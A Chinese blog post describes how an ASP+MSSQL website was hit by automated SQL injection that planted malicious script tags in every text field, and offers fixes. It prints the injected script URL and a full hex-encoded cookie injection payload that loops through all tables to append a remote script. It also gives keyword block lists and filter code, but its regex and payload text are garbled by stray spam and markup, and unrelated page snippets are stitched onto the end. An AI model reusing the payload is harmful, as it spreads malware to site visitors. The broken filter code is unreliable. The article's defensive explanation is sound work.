这阵子,采用ASP+MSSQL设计的很多网站可能遭遇到sql数据库被挂马者插入JS木马的经历;这不,朋友的一个网站就被黑客忽悠了一把,mssql的每个varchar、text字段都被自动插入一段js代码,即使删除这段代码,如果没有从源头上解决,几分钟后,js代码就又会自动插入数据库。
经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;然后,黑客就把这个网站纳入他的肉鸡列表,随时在数据库里加入自己希望加的js代码,而这些代码往往是包含着众多的的病毒、木马,最终让访问受控网站的用户的电脑中毒。
虽然,可以通过sql查询分析器执行批量代换,暂时解决被插入的js代码问题,然而不从根本上解决整个网站存在的漏洞,包括程序上和服务器安全权限,那么黑客还是随时可以入侵你的网站数据库。
在sql查询分析器里可以执行以下的代码批量替换js代码:
“
update 表名 set 字段名=replace(字段名,'<Script Src=http://c.n%75clear3.com/css/c.js></Script>','') ”
text类型用这个: update tablename set fieldA=replace(cast(fieldA as varchar(8000)) ,'aa','')
flymorn仔细检查了网站,发现网站存在几个安全问题:
第一,网站存在上传漏洞;虽然,上传文件需要管理员身份验证,也对上传文件进行了文件格式的认证,但管理员身份验证采用了cookies,而cookies是可以被伪造的,而且如果上传了图片后,不对该文件的内容采取任何判断的话,那么图片木马也很有可能被上传。
解决措施:1 删除上传文件功能(不太实际);2 修改上传用户验证为session验证;3 对上传后的文件内容进行验证,如果是图片木马,则删除;可以参考以下的验证代码:
''===============判断上传文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '读取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write("<script>alert('您上传的文件有问题,上传失败!');history.back();</script>")
Response.End
end if
next
''=================判断上传文件是否含非法字符串end===================
第二,网站存在cookies注入漏洞。由于程序设计中,为了考虑到减小服务器的开销,所有用户登陆后采用cookies验证,这个cookies里保存了用户的 ID 和 NAME ,而众所周知,cookies是经常被黑客伪造的,这是其一;另外,某些外部参数 没有采用严格的 request.form 和 request.querystring 来获取内容,为了简便,采用了 request("id") 这样的方式。
我们知道,ASP 的request 是先从form、querystring里获取内容,如果这两个为空,则要从cookies里获取内容,大家往往在程序设计中考虑到了 request.form 和 request.querystring 的SQL注入,所以一般都会过滤 request.form 和 request.querystring进行sql注入;但却偏偏忘了过滤cookies方式下的注入。我们来看下下面这样的sql语句:
SQL="select * from 表名 where id="&request("id")
如果这个 id 恰巧是通过cookies来获取值的,那么想想,这是一件多么可怕的事啊!注入者可以轻松的伪造一个名为 id 的虚假 cookies ,因为这个 id 的cookies 是服务器分配给它的。这个cookies可以被伪造成类似下面这样的一段代码:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才网(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--
看晕了吧。这是利用HEX的方式进行SQL注入,可以绕过一般的IDS验证,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入js代码。
解决办法:1 严格过滤 request.form 和 request.querystring 获取的内容,坚决不用 request("name") 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作;2 重要的用户资料尽量采用 session 验证,因为session是服务器端的,客户端无法伪造数据,除非他有你服务器的权限。
可以采用以下的防范 get 、post以及cookies 注入的代码来过滤 sql 注入攻击:
<%
Response.Buffer = True '缓存页面
'防范get注入
If Request.QueryString <> "" Then StopInjection(Request.QueryString)
'防范post注入
If Request.Form <> "" Then StopInjection(Request.Form)
'防范cookies注入
If Request.Cookies <> "" Then StopInjection(Request.Cookies)
'正则子函数
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "'|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)"
Dim sItem, sValue
For Each sItem In Values
sValue = Values(sItem)
If regEx.Test(sValue) Then
Response.Write "<Script Language=javascript>alert('非法注入!你的行为已被记录!!');history.back(-1);</Script>"
Response.End
End If
Next
Set regEx = Nothing
End function
%>
把以上的代码另存为一个文件,如 antisql.asp ,然后在数据库连接文件开头包含这个文件 <!--#include file="antisql.asp"--> ,就可以实现全站的防范 sql 注入的攻击了。
第三,严格过滤外部提交数据。判断提交页面的来源,如果不是当前站点,则拒绝提交。可以参考以下的代码,虽然来源网址可以伪造,但有这样的判断,毕竟可以阻挡那些没有技术含量的恶意提交:
<%''判断来源,禁止外部提交
dim server_v1,server_v2
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if server_v1="" or instr(server_v1,"发表页面名")<=0 or mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<SCRIPT language=JavaScript>alert('来源非法,禁止外部提交!');"
response.write "this.location.href='vbscript:history.back()';</SCRIPT>"
response.end
end if%>
第四,做好服务器权限的分配。对于数据库的权限,尽量分配最小的权限给用户使用,如果把sa或管理员的权限分下来,一旦被攻击沦陷,这将是一个毁灭性的打击。mssql 的1433端口,飘易建议不用的时候,最好关闭。
总之,安全问题是一个综合的问题,一个小的细节,可能让你的几个月甚至几年的心血付之东流。我们不仅要从程序上着手每个细节,而且要仔细做好服务器的安全工作,对于虚拟主机的用户,还要防范服务器上的跨站攻击。细节决定成败。
分享到:
相关推荐
经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,...
在ASP(Active Server Pages)开发中,将Excel数据导入到MSSQL数据库或者从MSSQL数据库导出数据到Excel,是一项常见的需求。这通常涉及到数据迁移、数据分析和报告生成等场景。以下将详细讲解这一过程涉及的关键知识...
9. **异步处理**:对于涉及大量计算或数据库操作的功能,如批量导入或导出文章,可以采用异步处理,以避免阻塞主线程,提高系统响应速度。 10. **API接口**:如果系统需要与其他应用或服务集成,可以开发RESTful ...
采用Mssql数据库,存储过程、事务编写,支持百万级以上的需求,内核十分强健。2.网友,网站主和广告主都有后台可以对广告效果一目了然。3.要以单独对广告或单独对某个用户设置扣点率。4.可以整合你网站本身的注册用户...
仿赶集网asp.net+MSSQL大型数据库编程的分类信息网站管理系统源程序下载,分类信息网页模板,信息发布网站系统商业版。一个建立分类信息网站的智能建站系统,也是一个自助建站的分类信息网站程序商业版。分类网站管理...
### SQL注入技术详解:针对MS SQL Server的手动与自动化...对于企业来说,加强对SQL注入的防护措施至关重要,包括对用户输入进行严格过滤、使用参数化查询、限制数据库用户的权限等手段,以防止此类安全漏洞被利用。
新增了MSSQL数据库为你的网站添加无限动力,Access或MSSQL数据库任选 新增了后台定时任务,文章自动定时多点采集和自动生成HTML文件,让你的网站无人职守,自动更新 新增了WAP手机网站系统,让你的用户无论身在何处也...
asp+MSSQL大型数据库编程的分类信息网站管理系统源程序下载,分类网站模板,分类信息网页模板,信息发布网站系统商业版.一个建站分类信息网站的智能建站系统,也是一个自助建站的分类信息网站程序商业版.注册商家可...
这个系统利用了MSSQL数据库来存储和处理订单数据,并且在数据库操作中使用了储存过程,提高了效率和安全性。 1. **C#.NET**: C#.NET是微软开发的一种面向对象的编程语言,适用于Windows、Web和移动应用开发。在点餐...
ASP.NET企业网站信息管理系统源码 CMS源码 注意:不带技术支持,有帮助文件,虚拟商品,发货不退,看好再拍。 开发语言 : C# 数据库 : SQL2012 开发工具 : VS2012 源码类型 : WebForm 一、源码特点 采用典型的三...
仿赶集网asp.net+MSSQL大型数据库编程的分类信息网站管理系统源程序下载,分类信息网页模板,信息发布网站系统商业版。一个建立分类信息网站的智能建站系统,也是一个自助建站的分类信息网站程序商业版。分类网站管理...
仿赶集网asp.net+MSSQL大型数据库编程的分类信息网站管理系统源程序下载,分类信息网页模板,信息发布网站系统商业版。一个建立分类信息网站的智能建站系统,也是一个自助建站的分类信息网站程序商业版。分类网站管理...
本人仅业余学习一些基础的ASP知识以供系统设计之用,并非专业人员,相关服务器设置、MSSQL/MySQL数据库方面的专业问题请自行解决。 本人仅提供本系统相关的一些技术问题的解释、解答。 运行环境: 服务器需要: ...
系统采用MSSQL数据库,可支持上数千万的数据库,更安全、更稳定、更高效、更强大,运行速度更快。 自动签合同功能 当会注册成功了系统会自动生成一个文件形式的合同,进入会员中心后可以查看合同文本。 系统安全 ...
系统采用MSSQL数据库,可支持上数千万的数据库,更安全、更稳定、更高效、更强大,运行速度更快。 系统安全 本以安全为基础,密码采用MD5加密,保证用户资料安全,程序代码中设计周密,可自动屏蔽恶意攻击代码。 更...
采用Mssql数据库,存储过程、事务编写,支持百万级以上的需求,内核十分强健。2.网友,网站主和广告主都有后台可以对广告效果一目了然。3.要以单独对广告或单独对某个用户设置扣点率。4.可以整合你网站本身的注册用户...
”这类关键字可以帮助发现韩国服务器上可能存在安全漏洞的网站,这些服务器往往运行着MSSQL数据库。 #### 方法二:特定网站结构定位 - **技术要点**:使用Google高级搜索功能,结合特定的URL结构(如“site:cq....
系统采用MSSQL数据库,可支持上数千万的数据库,更安全、更稳定、更高效、更强大,运行速度更快。 系统安全 本以安全为基础,密码采用MD5加密,保证用户资料安全,程序代码中设计周密,可自动屏蔽恶意攻击代码。 更...